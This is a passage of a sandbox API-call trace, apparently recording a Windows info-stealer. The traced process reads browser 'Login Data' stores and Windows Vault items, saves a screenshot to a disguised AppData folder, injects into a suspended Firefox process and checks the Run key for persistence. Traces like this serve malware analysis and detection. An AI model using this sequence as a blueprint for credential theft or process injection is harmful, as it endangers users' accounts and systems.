IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.836] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x30, ByteOffset=0x24d3b0*=1180, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.836] NtClose (Handle=0xac) returned 0x0 [0106.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.836] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.836] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.836] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1c, ByteOffset=0x24d3b0*=1228, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.836] NtClose (Handle=0xac) returned 0x0 [0106.836] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.836] 
RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.836] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.836] NtQueryInformationFile (FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5) [0106.852] NtOpenProcessToken (ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24d8c8) [0106.868] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x24d7ec | out: BaseAddress=0x24d7ec*=0x766f0000) returned 0x0 [0106.885] CoInitialize (pvReserved=0x0) returned 0x0 [0106.892] CoCreateInstance (in: rclsid=0x24d8d4*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x24d8e4*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0x24d8fc | out: ppv=0x24d8fc*=0x11ddc0) returned 0x0 [0106.907] IUrlHistoryStg:EnumUrls (in: This=0x11ddc0, ppenum=0x24d8f8 | out: ppenum=0x24d8f8*=0x11e008) returned 0x0 [0106.947] IUnknown:Release (This=0x11ddc0) returned 0x1 [0106.947] CoUninitialize () [0106.960] NtEnumerateValueKey (in: 
KeyHandle=0xa4, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24d920, Length=0x800, ResultLength=0x24e7d8 | out: KeyValueInformation=0x24d920, ResultLength=0x24e7d8) returned 0x8000001a [0106.960] NtClose (Handle=0xa4) returned 0x0 [0106.971] NtCreateKey (in: KeyHandle=0x24e73c, DesiredAccess=0x20219, ObjectAttributes=0x24e5b4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e73c*=0xa4) returned 0x0 [0106.971] NtQueryValueKey (in: KeyHandle=0xa4, ValueName="CurrentVersion", KeyValueInformationClass=0x1, KeyValueInformation=0x128200, Length=0x100, ResultLength=0x24e724 | out: KeyValueInformation=0x128200*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x1a, NameLength=0x1c, Name="CurrentVersion", Data="25.0 (en-US)"), ResultLength=0x24e724) returned 0x0 [0106.971] NtClose (Handle=0xa4) returned 0x0 [0106.981] RtlCharToInteger (in: String="25.0 (en-US)", Base=0x0, Value=0x127d9c | out: Value=0x127d9c) returned 0x0 [0106.981] NtCreateKey (in: KeyHandle=0x24e73c, DesiredAccess=0x20219, ObjectAttributes=0x24e5d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e73c*=0xa4) returned 0x0 [0106.981] NtQueryValueKey (in: KeyHandle=0xa4, ValueName="Install Directory", KeyValueInformationClass=0x1, KeyValueInformation=0x127e00, Length=0x200, ResultLength=0x24e724 | out: KeyValueInformation=0x127e00*(TitleIndex=0x0, Type=0x1, DataOffset=0x38, DataLength=0x42, NameLength=0x22, Name="Install Directory", Data="C:\\Program Files\\Mozilla Firefox"), ResultLength=0x24e724) returned 0x0 [0106.981] NtClose (Handle=0xa4) returned 
0x0 [0106.981] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="PATH", Value=0x24e380 | out: Value="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x0 [0106.989] RtlSetEnvironmentVariable (in: Environment=0x0, Name="PATH", Value="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Mozilla Firefox" | out: Environment=0x0) returned 0x0 [0106.989] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="C:\\Program Files\\Mozilla Firefox\\nss3.dll", BaseAddress=0x24e378 | out: BaseAddress=0x24e378*=0x0) returned 0xc0000135 [0107.236] RtlSetEnvironmentVariable (in: Environment=0x0, Name="PATH", Value="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" | out: Environment=0x0) returned 0x0 [0107.236] NtCreateKey (in: KeyHandle=0x24e734, DesiredAccess=0x20219, ObjectAttributes=0x24e5ac*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e734*=0x0) returned 0xc0000022 [0107.237] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0x24e39c | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x0 [0107.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0x24e370, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.237] NtCreateFile (in: FileHandle=0x24e390, DesiredAccess=0x120089, ObjectAttributes=0x24e358*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e378, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e390*=0xa4, IoStatusBlock=0x24e378*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.271] NtQueryInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x24e378, FileInformation=0x24e2d0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e378, FileInformation=0x24e2d0) returned 0x0 [0107.271] NtClose (Handle=0xa4) returned 0x0 [0107.271] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="winsqlite3.dll", BaseAddress=0x24e32c | out: BaseAddress=0x24e32c*=0x0) returned 0xc0000135 [0107.272] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24e2ec | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0107.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0x24e2d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.272] NtCreateFile (in: FileHandle=0x24e2f0, DesiredAccess=0x120089, ObjectAttributes=0x24e2b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e2d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e2f0*=0xffffffff, IoStatusBlock=0x24e2d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a 
[0107.272] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0x24e514 | out: BaseAddress=0x24e514*=0x722a0000) returned 0x0 [0107.314] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtPathName=0x24e3e4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.314] NtCreateFile (in: FileHandle=0x24e404, DesiredAccess=0x120089, ObjectAttributes=0x24e3cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e3ec, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e404*=0xffffffff, IoStatusBlock=0x24e3ec*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0107.314] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtPathName=0x24e3fc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.314] NtCreateFile (in: FileHandle=0x24e41c, DesiredAccess=0x12019f, ObjectAttributes=0x24e3e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e404, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e41c*=0xf4, IoStatusBlock=0x24e404*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0107.315] NtQueryInformationFile (in: 
FileHandle=0xf4, IoStatusBlock=0x24e404, FileInformation=0x24e35c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e404, FileInformation=0x24e35c) returned 0x0 [0107.315] NtWriteFile (in: FileHandle=0xf4, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24e404, Buffer=0x106960*, Length=0x28, ByteOffset=0x24e374*=0, Key=0x0 | out: IoStatusBlock=0x24e404, Buffer=0x106960*) returned 0x0 [0107.315] NtClose (Handle=0xf4) returned 0x0 [0107.315] VaultEnumerateVaults () returned 0x0 [0107.846] VaultOpenVault () returned 0x0 [0107.846] VaultEnumerateItems () returned 0x0 [0107.846] VaultFree () returned 0x0 [0107.846] VaultCloseVault () returned 0x0 [0107.847] VaultOpenVault () returned 0x0 [0107.847] VaultEnumerateItems () returned 0x0 [0107.847] VaultFree () returned 0x0 [0107.847] VaultCloseVault () returned 0x0 [0107.847] VaultFree () returned 0x1 [0107.847] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="gdiplus.dll", BaseAddress=0x24e3d0 | out: BaseAddress=0x24e3d0*=0x73d70000) returned 0x0 [0107.887] GetDC (hWnd=0x0) returned 0x2401080f [0107.888] CreateCompatibleDC (hdc=0x2401080f) returned 0x2901071a [0107.888] GetSystemMetrics (nIndex=0) returned 1440 [0107.888] GetSystemMetrics (nIndex=1) returned 900 [0107.888] CreateCompatibleBitmap (hdc=0x2401080f, cx=1440, cy=900) returned 0x24050907 [0107.889] SelectObject (hdc=0x2901071a, h=0x24050907) returned 0x185000f [0107.889] BitBlt (hdc=0x2901071a, x=0, y=0, cx=1440, cy=900, hdcSrc=0x2401080f, x1=0, y1=0, rop=0xcc0020) returned 1 [0107.890] GdiplusStartup (in: token=0x24e7a4, input=0x24e770, output=0x0 | out: token=0x24e7a4, output=0x0) returned 0x0 [0107.893] GdipCreateBitmapFromHBITMAP (hbm=0x24050907, hpal=0x0, bitmap=0x24e7a0) returned 0x0 [0107.921] GdipGetImageEncodersSize (numEncoders=0x24e43c, size=0x24e438) returned 0x0 [0107.922] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x12f9a8 | out: encoders=0x12f9a8) returned 0x0 [0107.922] GdipSaveImageToFile 
(image=0x25a2230, filename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogim.jpeg", clsidEncoder=0x24e760*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0107.956] GdiplusShutdown (token=0x28f34) [0107.983] DeleteObject (ho=0x24050907) returned 1 [0107.983] DeleteObject (ho=0x2901071a) returned 1 [0107.984] ReleaseDC (hWnd=0x0, hDC=0x2401080f) returned 1 [0107.986] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24e2e4 | out: Value="C:\\Program Files") returned 0x0 [0107.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x24e2b8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0107.986] NtCreateFile (in: FileHandle=0x24e2d8, DesiredAccess=0x120089, ObjectAttributes=0x24e2a0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e2c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e2d8*=0x120, IoStatusBlock=0x24e2c0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.986] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x24e2c0, FileInformation=0x24e218, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e2c0, FileInformation=0x24e218) returned 0x0 [0107.986] NtClose (Handle=0x120) returned 0x0 [0107.995] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x24e088, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, 
DirectoryInfo=0x0) returned 1 [0107.995] NtCreateFile (in: FileHandle=0x24e0a8, DesiredAccess=0x120089, ObjectAttributes=0x24e070*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e090, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e0a8*=0x120, IoStatusBlock=0x24e090*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.995] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x24e090, FileInformation=0x24dfe8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e090, FileInformation=0x24dfe8) returned 0x0 [0107.997] NtReadFile (in: FileHandle=0x120, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24e090, Buffer=0x12ffc8, BufferLength=0x43470, ByteOffset=0x24e000*=0, Key=0x0 | out: IoStatusBlock=0x24e090, Buffer=0x12ffc8*) returned 0x0 [0108.019] NtClose (Handle=0x120) returned 0x0 [0108.022] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x24e584*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24e55c, hNewToken=0x0 | out: lpProcessInformation=0x24e55c*(hProcess=0x11c, hThread=0x120, dwProcessId=0xce4, dwThreadId=0xce8), hNewToken=0x0) returned 1 [0108.026] NtQueryInformationProcess (in: ProcessHandle=0x11c, ProcessInformationClass=0x0, ProcessInformation=0x24e088, ProcessInformationLength=0x18, ReturnLength=0x0 | 
out: ProcessInformation=0x24e088, ReturnLength=0x0) returned 0x0 [0108.026] NtReadVirtualMemory (in: ProcessHandle=0x11c, BaseAddress=0x7ffd9000, Buffer=0x24e2fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x24e2fc*, NumberOfBytesRead=0x0) returned 0x0 [0108.026] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x11c, BaseAddress=0x24e0a8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e0a4*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x24e0a8*=0x1f0000, SectionOffset=0x0, ViewSize=0x24e0a4*=0x9c4000) returned 0x0 [0108.026] NtCreateSection (in: SectionHandle=0x24e09c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e05c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24e09c*=0x128) returned 0x0 [0108.026] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0xffffffff, BaseAddress=0x24e0a4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e05c*=0x109a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e0a4*=0x2aa0000, SectionOffset=0x0, ViewSize=0x24e05c*=0x10a000) returned 0x0 [0108.026] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0x11c, BaseAddress=0x24e0a0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e098*=0x109a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e0a0*=0xbc0000, SectionOffset=0x0, ViewSize=0x24e098*=0x10a000) returned 0x0 [0108.032] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x2aa0000) returned 0x0 [0108.038] NtClose (Handle=0x128) returned 0x0 [0108.038] NtReadVirtualMemory (in: ProcessHandle=0x11c, BaseAddress=0x1240000, Buffer=0x24d0048, NumberOfBytesToRead=0x44000, NumberOfBytesRead=0x0 | out: Buffer=0x24d0048*, NumberOfBytesRead=0x0) returned 0x0 [0108.045] NtCreateSection (in: SectionHandle=0x24e348, 
DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e090, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24e348*=0x128) returned 0x0 [0108.045] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0xffffffff, BaseAddress=0x24e34c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e090*=0x44000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e34c*=0x690000, SectionOffset=0x0, ViewSize=0x24e090*=0x44000) returned 0x0 [0108.047] NtUnmapViewOfSection (ProcessHandle=0x11c, BaseAddress=0x1240000) returned 0x0 [0108.050] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0x11c, BaseAddress=0x24e350*=0x1240000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e57c*=0x44000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e350*=0x1240000, SectionOffset=0x0, ViewSize=0x24e57c*=0x44000) returned 0x0 [0108.050] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x690000) returned 0x0 [0108.053] NtResumeThread (in: ThreadHandle=0x120, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0108.053] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0108.053] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0108.053] NtClose (Handle=0x124) returned 0x0 [0108.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program 
Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.053] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0108.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.053] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0108.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0108.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, 
ResultLength=0x0) returned 0x0 [0108.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0108.107] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0113.105] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0113.105] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0113.106] NtClose (Handle=0x124) returned 0x0 [0113.106] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program 